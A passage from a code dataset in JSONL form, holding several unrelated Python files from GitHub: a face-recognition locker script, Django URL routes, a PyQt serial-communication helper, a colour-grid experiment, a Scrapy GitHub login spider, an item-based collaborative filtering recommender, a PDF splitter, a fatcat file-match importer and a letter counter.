s3')","repo_name":"aws-samples/mlops-amazon-sagemaker","sub_path":"1-Built-In-Algorithm/lambda-code/MLOps-BIA-GetStatus.py","file_name":"MLOps-BIA-GetStatus.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":268,"dataset":"github-code","pt":"53"} +{"seq_id":"358580970","text":"import face_recognition\nimport cv2\nimport numpy as np\nimport os\nimport sys\n\ncurDir = os.getcwd()\n# basePath = 'public/uploads'\nbasePath = os.path.join(curDir, 'public', 'uploads')\nlockerid = sys.argv[1]\nwhom_var = sys.argv[2]\nwhat_var = sys.argv[3]\n\nencodingPath = os.path.join(curDir, 'encodings', lockerid)\nencodingFile = f'{encodingPath}.npy'\n\n\ndef appendImage(path, image, lst):\n curImg = cv2.imread(os.path.join(path, image))\n lst.append(curImg)\n classNames.append(os.path.splitext(image)[0])\n\n\nif what_var == 'enco':\n if(os.path.exists(encodingFile)):\n print('SM_ENCOS')\n else:\n banker_img = os.path.join(basePath, 'banker')\n user_img = os.path.join(basePath, lockerid)\n print(user_img)\n images = []\n classNames = []\n bankerDir = os.listdir(banker_img)\n userDir = os.listdir(user_img)\n # print(myList)\n for cl in bankerDir:\n appendImage(banker_img, cl, images)\n for cl in userDir:\n appendImage(user_img, cl, images)\n\n def findEncodings(images):\n encodeList = []\n for img in images:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n encode = face_recognition.face_encodings(img)[0]\n encodeList.append(encode)\n return encodeList\n\n encodeListKnown = findEncodings(images)\n with open(encodingFile, 'wb') as f:\n np.save(f, [classNames, encodeListKnown], allow_pickle=True)\n print('SM_ENCOS')\n\n# print(classNames)\n\n\nif what_var == 'reco':\n\n with open(f'{encodingPath}.npy', 'rb') as f:\n loaded_data = np.load(f, allow_pickle=True)\n classNames = loaded_data[0]\n encodeListKnown = loaded_data[1]\n # print(classNames, encodeListKnown)\n\n cap = cv2.VideoCapture(0)\n while True:\n success, img = cap.read()\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\n facesCurFrame = face_recognition.face_locations(imgS)\n encodesCurFrame = face_recognition.face_encodings(imgS, facesCurFrame)\n for encodeFace, faceLoc in zip(encodesCurFrame, facesCurFrame):\n matches = face_recognition.compare_faces(\n encodeListKnown, encodeFace)\n faceDis = face_recognition.face_distance(\n encodeListKnown, encodeFace)\n print(faceDis)\n matchIndex = np.argmin(faceDis)\n if matches[matchIndex]:\n name = classNames[matchIndex].upper()\n print(name)\n y1, x2, y2, x1 = faceLoc\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.rectangle(img, (x1, y2-35), (x2, y2),\n (0, 255, 0), cv2.FILLED)\n cv2.putText(img, name, (x1 + 6, y2-6),\n cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\n\n cv2.imshow('Webcam', img)\n cv2.waitKey(1)\n","repo_name":"Aashi1109/digilocker","sub_path":"fr_final.py","file_name":"fr_final.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16573957503","text":"# remove_none_values removes all keys from a dictionary\n# where the value was None\ndef remove_none_values(dict):\n keys_to_delete = []\n for key, value in dict.items():\n if value is None:\n keys_to_delete.append(key)\n for key_to_delete in keys_to_delete:\n del dict[key_to_delete]\n return dict\n","repo_name":"gregoryholl/gregoryholl","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26557074701","text":"\"\"\"rentATractor URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom app import views\nimport django.views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name=\"homepage\"),\n path('login', views.login),\n path('logout/', views.logout),\n path('register/', views.register),\n path('catalogo/',views.catalogo),\n path('producto/',views.producto),\n path('cesta/', views.cesta),\n path('cesta//', views.addCesta),\n path('cesta/remove//', views.removeCesta),\n path('cesta/update///', views.updateCesta),\n path('domicilioPago/', views.domicilioPago),\n path('borraPedido/', views.remove_pedido),\n path('create-checkout-session', views.payment_checkout),\n path('pago/', views.pago),\n path('confirmacion/', views.confirmacion),\n path('factura/', views.factura),\n path('cancelar/', views.cancelar),\n path('miCuenta/', views.miCuenta),\n path('favoritos/', views.favoritos),\n path('favoritos/', views.addFavorito),\n path('misPedidos/', views.misPedidos),\n path('sobreNosotros/', views.sobreNosotros),\n path('contacto/', views.contacto),\n path('atencionCliente/', views.atencionCliente),\n path('seguimientoPedidos/', views.seguimientoPedidos),\n path('politicaDevolucion/', views.politicaDevolucion),\n path('politicaEnvio/', views.politicaEnvio),\n path('reclamacion/', views.reclamacion),\n path('opinion/', views.opinion),\n path('terminosCondicionesUso/', views.terminosCondicionesUso),\n path('politicaPrivacidad/', views.politicaPrivacidad),\n path('condicionesAlquiler/', views.condicionesAlquiler),\n path('media/', django.views.static.serve,\n {'document_root': settings.MEDIA_ROOT}),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"marsamber/PGPI","sub_path":"code/rentATractor/rentATractor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4323342425","text":"\"\"\"Base module helper for UI.\n\nRegroup helper for UI class : the widget_ui, communication_handler and the\ninner EventLogger.\n\nModule : base_ui\nAuthors : yannick, vincet\n\"\"\"\nimport logging\nimport PyQt6.QtCore\nimport PyQt6.QtWidgets\nimport helper\nimport serial_comms\n\n\nclass EventLogger(PyQt6.QtCore.QObject):\n \"\"\"Manage all operation on log_event signal and receiver registration.\"\"\"\n\n __log_event = PyQt6.QtCore.pyqtSignal(str)\n\n def __init__(self):\n \"\"\"Init the mandatory QObject to manage Signal.\"\"\"\n PyQt6.QtCore.QObject.__init__(self)\n\n def log_message(self, msg: str):\n \"\"\"Send the log message to all receiver.\"\"\"\n self.__log_event.emit(msg)\n\n def register_to_logger(self, logger):\n \"\"\"Register a receiver on the log signal.\"\"\"\n self.__log_event.connect(logger)\n\n def unregister_to_logger(self, logger):\n \"\"\"Unregister a receiver on the log signal.\"\"\"\n self.__log_event.disconnect(logger)\n\n\nclass WidgetUI(PyQt6.QtWidgets.QWidget):\n \"\"\"Load the .ui file and set item to the current class. Provide a quick access to logger.\"\"\"\n\n logger = EventLogger()\n tech_log : logging.Logger = None \n\n def __init__(self, parent: PyQt6.QtWidgets.QWidget = None, ui_form: str = \"\"):\n \"\"\"Load the .ui file and map it.\"\"\"\n PyQt6.QtWidgets.QWidget.__init__(self, parent)\n self.tech_log = logging.getLogger(ui_form)\n if ui_form:\n PyQt6.uic.loadUi(helper.res_path(ui_form), self)\n\n def init_ui(self):\n \"\"\"Prototype of init_ui to manage this status in subclass.\"\"\"\n return True\n\n def log(self, message):\n \"\"\"Access to the internal logger and offer a log message to all subclass.\"\"\"\n self.logger.log_message(message)\n\n\nclass CommunicationHandler:\n \"\"\"Store the serial communication to share it to subclass and offer register operation.\"\"\"\n\n CMDFLAG_GET\t= 0x01\n CMDFLAG_SET\t =\t0x02\n CMDFLAG_INFOSTRING\t= 0x08\n CMDFLAG_GETADR\t =\t0x10\n CMDFLAG_SETADR\t =\t0x20\n CMDFLAG_HIDDEN\t= 0x40\n CMDFLAG_DEBUG\t= 0x80\n\n comms: serial_comms.SerialComms = None\n\n def __init__(self):\n \"\"\"Do nothing on the constructor.\"\"\"\n\n def __del__(self):\n \"\"\"Unregister all callback on class destruction.\"\"\"\n self.remove_callbacks()\n\n # deletes all callbacks to this class\n def remove_callbacks(self, handler = None):\n \"\"\"Remove all callback in SerialComms object (static).\"\"\"\n if handler is None : handler = self\n serial_comms.SerialComms.removeCallbacks(handler)\n\n def register_callback(\n self,\n cls,\n cmd,\n callback,\n instance=0,\n conversion=None,\n adr=None,\n delete=False,\n typechar=\"?\",\n ):\n \"\"\"Register a callback that can be deleted automatically later.\"\"\"\n # Callbacks normally must prevent sending a value change command in this callback\n # to prevent the same value from being sent back again\n serial_comms.SerialComms.registerCallback(\n self,\n cls=cls,\n cmd=cmd,\n callback=callback,\n instance=instance,\n conversion=conversion,\n adr=adr,\n delete=delete,\n typechar=typechar,\n )\n\n def get_value_async(\n self,\n cls,\n cmd,\n callback,\n instance: int = 0,\n conversion=None,\n adr=None,\n typechar=\"?\",\n delete=True,\n ):\n \"\"\"Ask a value to the board from in async way.\"\"\"\n self.comms.getValueAsync(\n self,\n cls=cls,\n cmd=cmd,\n callback=callback,\n instance=instance,\n conversion=conversion,\n adr=adr,\n typechar=typechar,\n delete=delete,\n )\n\n def serial_write_raw(self, cmd):\n \"\"\"Write a command in direct mode througt serial.\"\"\"\n self.comms.serialWriteRaw(cmd)\n\n def send_value(self, cls, cmd, val, adr=None, instance=0):\n \"\"\"Send a value for a specific paramter to the board.\"\"\"\n self.comms.sendValue(\n self, cls=cls, cmd=cmd, val=val, adr=adr, instance=instance\n )\n\n def send_command(self, cls, cmd, instance=0, typechar=\"?\",adr=None):\n \"\"\"Send one command to the board.\"\"\"\n self.comms.sendCommand(cls, cmd, instance=instance, typechar=typechar,adr=adr)\n\n def send_commands(self, cls, cmds, instance=0, typechar=\"?\",adr=None):\n \"\"\"Send colection of command to the board.\"\"\"\n cmdstring = \"\"\n for cmd in cmds:\n if adr != None:\n cmdstring += f\"{cls}.{instance}.{cmd}{typechar}{adr};\"\n else:\n cmdstring += f\"{cls}.{instance}.{cmd}{typechar};\"\n self.comms.serialWriteRaw(cmdstring)\n\n def comms_reset(self):\n \"\"\"Send the reset reply.\"\"\"\n self.comms.reset()\n\n def process_virtual_comms_buffer(self, buffer:str):\n \"\"\"Inject the string buffer in the comms parser and process it as it a board answer.\"\"\"\n first_end_marker = buffer.find(\"]\")\n first_start_marker = buffer.find(\"[\")\n match = self.comms.cmdRegex.search(\n buffer, first_start_marker, first_end_marker + 1\n )\n if match:\n self.comms.processMatchedReply(match)\n self.comms.processMatchedReply(match)\n\n def get_raw_reply(self):\n \"\"\"Expose the raw reply pySignal to connect on it.\"\"\"\n return self.comms.rawReply\n","repo_name":"Ultrawipf/OpenFFBoard-configurator","sub_path":"base_ui.py","file_name":"base_ui.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"53"} +{"seq_id":"12470115021","text":"import numpy as np\nimport psychopy as py\nimport matplotlib as mpl \nimport pandas as pd \nfrom skimage.color import rgb2hsv, hsv2rgb \nimport matplotlib.pyplot as mplpy \nimport cv2\nfrom copy import deepcopy\n\nnumBlocks = 3 #number of blocks in rows or columns (so n = 3 is a 3x3 grid) \ngridSize = 150 #overall pixels in grid \nGridType = 2\nnTrialTypes = 2\n\ncounter = 0\nprint('Instructions: In each round, two colored grids will be displayed (one after the other). When prompted, indicate whether the two grids were the same or different.')\nanswer_vector = []\ngroundtruth = [] #keeping track of whether the grid is disharmonious or harmonious\nsamedifferent = [] #keeping track of whether the grid was the same or different in the trial\n\nwhile counter <= 6: #the program will run for 5 rounds \n counter += 1\n blankMat = np.zeros((gridSize,gridSize))\n \n trialType = np.random.randint(GridType) #if trial type =1 harmonious, if 2, disharmonious\n groundtruth.append(trialType) #trying to concatonate\n #trialType = 1 #right now, just shortcut for it to be 1 -- once we have code for trialType = 2 we can delete\n useHSV = True\n #import ipdb; ipdb.set_trace()\n\n if trialType == 0: # harmonious -----------------------------\n pass\n\n else: #if trialType == 1 --> disharmonious grid \n if useHSV:\n print(\"disharmonious\")\n randomHue = np.random.rand(numBlocks,numBlocks) #picking one color channel and random int within that color\n # c should give number between 0 and 1 for HUE\n randomSat = np.random.rand(numBlocks, numBlocks)\n #randomSat creates a numB by numBlocks matrix, filled with values from 0 to 1 \n randomValue = 0.2 * np.random.rand() + 0.8 #making sure that the value is never 0\n #resizedChannel = cv2.resize(randomSat.astype(np.uint8), (gridSize,gridSize), interpolation=cv2.INTER_NEAREST_EXACT)\n displayImage = np.zeros((numBlocks,numBlocks,3), dtype=np.float32) #the 3 is for color channels \n displayImage[:,:,0] = randomHue #+= because randomHue is a single number, not a matrix\n displayImage[:,:,1] = randomSat #randomSat is a matrix \n displayImage[:,:,2] += randomValue\n \n RGBImage = hsv2rgb(displayImage) * 255\n RGBImage = cv2.resize(RGBImage.astype(np.uint8), (gridSize,gridSize), interpolation=cv2.INTER_NEAREST_EXACT) \n \n else: \n pass \n\n mplpy.imshow(RGBImage)\n mplpy.axis('off')\n mplpy.pause(3)\n \n mplpy.imshow(blankMat)\n mplpy.axis('off')\n mplpy.pause(3)\n \n\n GridSD = np.random.randint(nTrialTypes)\n samedifferent.append(GridSD)\n \n if GridSD == 0: #Show the same disharmonious grid as user just saw -----------------------\n print('Disharmonious Same')\n \n mplpy.imshow(RGBImage) #showing same grid\n mplpy.axis('off')\n mplpy.pause(3)\n\n mplpy.imshow(blankMat)\n mplpy.axis('off')\n mplpy.pause(3)\n\n else: #if GridSD == 1, show the original disharmonious grid, with one lego different \n print('Disharmonious Different')\n funkyLegoX = np.random.randint(numBlocks)\n funkyLegoY = np.random.randint(numBlocks)\n funkyLegoGrid = deepcopy(displayImage)\n\n # change hue and saturation for a randomly selected pixel\n funkyLegoGrid[funkyLegoX, funkyLegoY, 0] = np.random.rand()\n funkyLegoGrid[funkyLegoX, funkyLegoY, 1] = np.random.rand()\n funkyLegoGrid = hsv2rgb(funkyLegoGrid) * 255 \n funkyLegoGrid = cv2.resize(funkyLegoGrid.astype(np.uint8), (gridSize,gridSize), interpolation=cv2.INTER_NEAREST_EXACT)\n \n mplpy.imshow(funkyLegoGrid) #showing the new disharmonious grid\n mplpy.axis('off')\n mplpy.pause(3)\n\n mplpy.imshow(blankMat)\n mplpy.axis('off')\n mplpy.pause(3)\n\n\n \n \n \n \n\n \n\n\n\n\n\n ","repo_name":"rachelecarlson/teampurple2.0FINAL-","sub_path":"disharmonious grid .py","file_name":"disharmonious grid .py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73676344489","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GithubSpider(scrapy.Spider):\n name = 'github'\n allowed_domains = ['github.com']\n start_urls = ['https://github.com/login']\n\n def parse(self, response):\n authenticity_token = response.xpath(\"//input[@name='authenticity_token']/@value\").extract_first()\n utf8 = response.xpath(\"//input[@name='utf8']/@value\").extract_first()\n commit = response.xpath(\"//input[@name='commit']/@value\").extract_first()\n post_data = dict(\n # 填写账号\n login=\"\",\n # 填写密码\n password=\"\",\n authenticity_token=authenticity_token,\n utf8=utf8,\n commit=commit\n )\n yield scrapy.FormRequest(\n \"https://github.com/session\",\n formdata=post_data,\n callback=self.after_login\n )\n\n def after_login(self,response):\n if response.url == \"https://github.com/\":\n print('登陆成功')\n else:\n print('登陆失败')\n","repo_name":"wangquan1024/webSpider","sub_path":"scrapy_demo/github_spider/github_spider/spiders/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41889394172","text":"from django.conf.urls import patterns, url\nfrom data import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^happiness/$', views.happiness, name='happiness'),\n url(r'^sleep/$', views.sleep, name='sleep'),\n url(r'^summary/$', views.summary, name='summary'),\n url(r'^edit/(?P[0-9]+)/$', views.edit, name='edit')\n)","repo_name":"theyiwen/reportersite","sub_path":"data/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22106171218","text":"from typing import Any, Dict, List, Optional\n\nimport fatcat_openapi_client\nfrom fatcat_openapi_client import ApiClient, FileEntity\n\nfrom fatcat_tools.normal import clean_doi\n\nfrom .common import SANE_MAX_RELEASES, SANE_MAX_URLS, EntityImporter, make_rel_url\n\n\nclass MatchedImporter(EntityImporter):\n \"\"\"\n Importer for \"file to crossref DOI\" matches.\n\n These matches are currently generated by Internet Archive hadoop jobs\n written in scala (part of the 'sandcrawler' repo/project), but could be\n generated by other parties as well.\n\n Input format is JSON with keys:\n - dois (list)\n - sha1 (hex)\n - md5 (hex)\n - sha256 (hex)\n - size (int)\n - cdx (list of objects)\n - dt (optional; if included creates wayback link)\n - url\n - mimetype\n - urls (list of strings... or objects?)\n\n Future handlings/extensions:\n - core_id, wikidata_id, pmcid, pmid: not as lists\n \"\"\"\n\n def __init__(self, api: ApiClient, **kwargs) -> None:\n\n eg_desc = (\n kwargs.pop(\"editgroup_description\", None)\n or \"Import of large-scale file-to-release match results. Source of metadata varies.\"\n )\n eg_extra = kwargs.pop(\"editgroup_extra\", dict())\n eg_extra[\"agent\"] = eg_extra.get(\"agent\", \"fatcat_tools.MatchedImporter\")\n super().__init__(api, editgroup_description=eg_desc, editgroup_extra=eg_extra, **kwargs)\n self.default_link_rel = kwargs.get(\"default_link_rel\", \"web\")\n self.default_mimetype = kwargs.get(\"default_mimetype\", None)\n\n def want(self, raw_record: Any) -> bool:\n return True\n\n def parse_record(self, obj: Dict[str, Any]) -> Optional[FileEntity]:\n dois = [d.lower() for d in obj.get(\"dois\", [])]\n\n # lookup dois\n re_list = set()\n for doi in dois:\n doi = clean_doi(doi)\n if not doi:\n self.counts[\"skip-bad-doi\"] += 1\n return None\n try:\n re = self.api.lookup_release(doi=doi)\n except fatcat_openapi_client.rest.ApiException as err:\n if err.status != 404:\n raise err\n re = None\n if re is None:\n # print(\"DOI not found: {}\".format(doi))\n pass\n else:\n re_list.add(re.ident)\n\n # look up other external ids\n for extid_type in (\n \"arxiv\",\n \"pmid\",\n \"pmcid\",\n \"jstor\",\n \"wikidata_qid\",\n \"core\",\n \"isbn13\",\n \"ark\",\n ):\n extid = obj.get(extid_type)\n if extid:\n try:\n re = self.api.lookup_release(**{extid_type: extid})\n except fatcat_openapi_client.rest.ApiException as err:\n if err.status != 404:\n raise err\n re = None\n if re is None:\n pass\n else:\n re_list.add(re.ident)\n\n release_ids = list(re_list)\n if len(release_ids) == 0:\n self.counts[\"skip-no-releases\"] += 1\n return None\n if len(release_ids) > SANE_MAX_RELEASES:\n self.counts[\"skip-too-many-releases\"] += 1\n return None\n\n # parse URLs and CDX\n urls_set = set()\n for url in obj.get(\"urls\", []):\n url = make_rel_url(url, default_link_rel=self.default_link_rel)\n if url is not None:\n urls_set.add(url)\n for cdx in obj.get(\"cdx\", []):\n original = cdx[\"url\"]\n if cdx.get(\"dt\"):\n wayback = \"https://web.archive.org/web/{}/{}\".format(cdx[\"dt\"], original)\n urls_set.add((\"webarchive\", wayback))\n url = make_rel_url(original, default_link_rel=self.default_link_rel)\n if url is not None:\n urls_set.add(url)\n urls = [fatcat_openapi_client.FileUrl(rel=rel, url=url) for (rel, url) in urls_set]\n if len(urls) == 0:\n self.counts[\"skip-no-urls\"] += 1\n return None\n if len(urls) > SANE_MAX_URLS:\n self.counts[\"skip-too-many-urls\"] += 1\n return None\n\n size = obj.get(\"size\")\n if size:\n size = int(size)\n\n mimetype = obj.get(\"mimetype\", self.default_mimetype)\n if not mimetype and urls:\n if urls[0].url.endswith(\".pdf\"):\n mimetype = \"application/pdf\"\n\n fe = FileEntity(\n md5=obj.get(\"md5\"),\n sha1=obj[\"sha1\"],\n sha256=obj.get(\"sha256\"),\n size=size,\n mimetype=mimetype,\n release_ids=release_ids,\n urls=urls,\n )\n return fe\n\n def try_update(self, fe: FileEntity) -> bool:\n # lookup sha1, or create new entity\n existing = None\n try:\n existing = self.api.lookup_file(sha1=fe.sha1)\n except fatcat_openapi_client.rest.ApiException as err:\n if err.status != 404:\n raise err\n\n if not existing:\n return True\n\n combined_release_ids = list(set(fe.release_ids + existing.release_ids))\n if set(combined_release_ids) == set(existing.release_ids) and len(existing.urls) > 0:\n # no new release matches *and* there are already existing URLs\n self.counts[\"exists\"] += 1\n return False\n\n # check for edit conflicts\n if existing.ident in [e.ident for e in self._edits_inflight]:\n self.counts[\"skip-update-inflight\"] += 1\n return False\n\n # minimum viable \"existing\" URL cleanup to fix dupes and broken links:\n # remove 'None' wayback URLs, and set archive.org rel 'archive'\n existing.urls = [\n u for u in existing.urls if not (\"://web.archive.org/web/None/\" in u.url)\n ]\n for i in range(len(existing.urls)):\n u = existing.urls[i]\n if u.rel == \"repository\" and \"://archive.org/download/\" in u.url:\n existing.urls[i].rel = \"archive\"\n\n # special case: if importing *new* from archive.org arxiv collections,\n # blow away any existing release_id mappings; this is a direct arxiv_id\n # map. This *should* be safe to run in all matched imports.\n is_arxiv = False\n for u in fe.urls:\n if \"archive.org/download/arxiv\" in u.url.lower():\n is_arxiv = True\n break\n if is_arxiv and fe.release_ids:\n existing.release_ids = fe.release_ids\n\n # merge the existing into this one and update\n existing.urls = list(set([(u.rel, u.url) for u in fe.urls + existing.urls]))\n existing.urls = [\n fatcat_openapi_client.FileUrl(rel=rel, url=url) for (rel, url) in existing.urls\n ]\n\n if len(existing.urls) > SANE_MAX_URLS:\n self.counts[\"skip-update-too-many-url\"] += 1\n return False\n existing.release_ids = list(set(fe.release_ids + existing.release_ids))\n if len(existing.release_ids) > SANE_MAX_RELEASES:\n self.counts[\"skip-update-too-many-releases\"] += 1\n return False\n existing.mimetype = existing.mimetype or fe.mimetype\n existing.size = existing.size or fe.size\n existing.md5 = existing.md5 or fe.md5\n existing.sha1 = existing.sha1 or fe.sha1\n existing.sha256 = existing.sha256 or fe.sha256\n edit = self.api.update_file(self.get_editgroup_id(), existing.ident, existing)\n self._edits_inflight.append(edit)\n self.counts[\"update\"] += 1\n return False\n\n def insert_batch(self, batch: List[FileEntity]) -> None:\n self.api.create_file_auto_batch(\n fatcat_openapi_client.FileAutoBatch(\n editgroup=fatcat_openapi_client.Editgroup(\n description=self.editgroup_description, extra=self.editgroup_extra\n ),\n entity_list=batch,\n )\n )\n","repo_name":"internetarchive/fatcat","sub_path":"python/fatcat_tools/importers/matched.py","file_name":"matched.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"16840703279","text":"from tqdm import tqdm\nimport math\n\nclass ItemCF:\n\n def __init__(self, train_data: dict, test_data: dict):\n \"\"\"\n ItemCF模型\n Args:\n train_data: dict, key = userID, value = set(movieID), user->items的倒排索引表\n test_data: dict, key = userID, value = set(movieID), user->items的倒排索引表\n \"\"\"\n self.train_userItems = train_data\n self.test_userItems = test_data\n # 计算相似度矩阵\n self.sim = self.calsimilarity()\n\n\n def calsimilarity(self) -> dict:\n \"\"\"\n Returns:\n similarity: dict, 相似度矩阵, sim[i][j]代表item_i和item_j之间的相似度\n \"\"\"\n sim = {} # 记录item_i和item_j之间共同交互过的用户数量, 对应user-item共现矩阵列向量的内积\n num = {} # 记录item_i所交互过的用户数量, 对应user-item共现矩阵列向量的大小\n for userid, items in tqdm(self.train_userItems.items(), desc=\"构建协同过滤矩阵>>>\"):\n for item_i in items:\n # item_i交互过的用户数量+1\n if item_i not in num:\n num[item_i] = 0\n num[item_i] += 1\n # 两两item之间被同一个用户点击过\n if item_i not in sim:\n sim[item_i] = {}\n for item_j in items:\n if item_i != item_j:\n if item_j not in sim[item_i]:\n sim[item_i][item_j] = 0\n sim[item_i][item_j] += 1\n # 计算相似度矩阵\n for item_i, items in tqdm(sim.items(), desc=\"计算相似度>>>\"):\n for item_j, score in items.items():\n sim[item_i][item_j] = score / math.sqrt(num[item_i] * num[item_j]) # 余弦相似度\n return sim\n def rec(self, K: int, N: int) -> dict:\n \"\"\"\n Args:\n K: int, 为用户交互过的每个item, 选择与其最相似的K个项目\n N: int, 给用户推荐的项目数量N\n Returns:\n items_rank: dict, items_rank[u]表示为用户u推荐的N个item集合\n \"\"\"\n items_rank = {}\n for u, _ in tqdm(self.test_userItems.items(), desc=\"TopN推荐>>>\"):\n items_rank[u] = {}\n for hist_item in self.train_userItems[u]: # 用户u历史上交互过的一个hist_item\n # 计算与hist_item相似的其他物品\n for item, score in sorted(self.sim[hist_item].items(), key=lambda x: x[1], reverse=True)[:K]: # 选择最相似的K个物品\n if item not in self.train_userItems[u]:\n if item not in items_rank[u]:\n items_rank[u][item] = 0\n items_rank[u][item] += score # 用户u对item的可能评分\n # 对item排序\n items_rank = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in items_rank.items()}\n items_rank = {k: set(x[0] for x in v) for k, v in items_rank.items()}\n return items_rank\n\n\n\n\n\n \n\n\n\n ","repo_name":"ADCa97/DLRS","sub_path":"recmodel/CF/ItemCF.py","file_name":"ItemCF.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41661693694","text":"import os\n\nfrom PyPDF2 import PdfReader, PdfWriter, PageObject\n\nfrom util import get_filename\n\n\ndef split_array_by_interval(array: list, interval: int) -> list[list]:\n \"\"\"Split an array by interval.\n\n Args:\n array (list): Array to split.\n interval (int): Size of the chunks.\n\n Returns:\n list[list]: List of splitted chunks.\n \"\"\"\n splitted_array = []\n\n for i in range(0, len(array), interval):\n splitted_array.append(array[i:i+interval])\n\n return splitted_array\n\n\ndef split_array_by_ranges(array: list, ranges: list[tuple]) -> list[list]:\n \"\"\"Split an array by ranges.\n\n Args:\n array (list): List to split.\n ranges (list[tuple]): Ranges as list of tuples (end, start).\n\n Returns:\n list[list]: List of splitted chunks.\n \"\"\"\n splitted_array = []\n\n for start, end in ranges:\n sub_array = array[start - 1:end]\n if sub_array:\n splitted_array.append(sub_array)\n\n return splitted_array\n\n\ndef write_pdf_chunks(pdf_chunks: list, destination: str, filename: str):\n\n if not os.path.exists(destination):\n os.makedirs(destination)\n\n for index, chunk in enumerate(pdf_chunks):\n writer = PdfWriter()\n\n chunk_name = filename.strip() + \" \" + str(index + 1) + \".pdf\"\n\n for page in chunk:\n writer.add_page(page)\n\n with open(os.path.join(destination, chunk_name), \"wb\") as output_pdf:\n writer.write(output_pdf)\n\n\ndef split_pdf_by_interval(file_path: str, destination: str, output_name: str, interval: int):\n pdf = PdfReader(file_path)\n\n pdf_chunks = split_array_by_interval(array=pdf.pages, interval=interval)\n\n write_pdf_chunks(\n pdf_chunks=pdf_chunks,\n destination=destination,\n filename=output_name\n )\n\n\ndef split_pdf_by_ranges(file_path: str, destination: str, output_name: str, ranges: list[tuple]):\n pdf = PdfReader(file_path)\n\n pdf_chunks = split_array_by_ranges(array=pdf.pages, ranges=ranges)\n\n write_pdf_chunks(\n pdf_chunks=pdf_chunks,\n destination=destination,\n filename=output_name\n )\n\n\nif __name__ == \"__main__\":\n # split_pdf_by_interval(\n # file_path=\"pdfs/bol.pdf\",\n # destination=\"pdfs/Best Of Lady Gaga\",\n # output_name=\"Best Of Lady Gaga - Trompette\",\n # interval=2\n # )\n split_pdf_by_ranges(\n file_path=\"pdfs/bol.pdf\",\n destination=\"pdfs/Best Of Lady Gaga\",\n output_name=\"Best Of Lady Gaga - Trompette\",\n ranges=[(1, 2), (3, 4), (5, 6)]\n )\n","repo_name":"PaulTorchet/pdf-tool","sub_path":"pdf_tool/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10589449901","text":"import os\n\nimport torch\n\nfrom language.utils.log import get_logger\n\n\nlogger = get_logger()\n\n\ndef save_embedding(embedding, path):\n \"\"\"\n Save word embedding tensor.\n :param embedding: Tensor, embedding tensor.\n :param path: path to save.\n :return: None.\n \"\"\"\n logger.info(f'Dumping word embedding to {path}.')\n os.makedirs(os.path.dirname(path), exist_ok=True)\n torch.save(embedding, path)\n\n\ndef load_embedding(path):\n \"\"\"\n Load word embedding tensor.\n :param path: path to embedding.\n :return: Tensor, word embedding.\n \"\"\"\n logger.info(f'Loading word embedding from {path}.')\n if not os.path.exists(path):\n raise FileExistsError(f'{path} does not exist.')\n\n return torch.load(path)\n","repo_name":"jishuguang/language","sub_path":"language/lm/utils/serialization.py","file_name":"serialization.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13266887644","text":"# Author: Justin Huang\n# GitHub username: huangjus\n# Date: 2/28/23\n# Description: takes a string as input and returns a dictionary that counts the occurrences of\n# each uppercase letter in the string. Only uppercase letters are counted,\n# and lower-case letters are converted to uppercase before counting.\n\ndef count_letters(string):\n\n \"\"\"\n Count the occurrences of each uppercase letter in the input string.\n\n string: The input string.\n \"\"\"\n\n counts = {}\n for char in string:\n if char.isupper():\n if char in counts:\n counts[char] += 1\n else:\n counts[char] = 1\n elif char.islower():\n char_upper = char.upper()\n 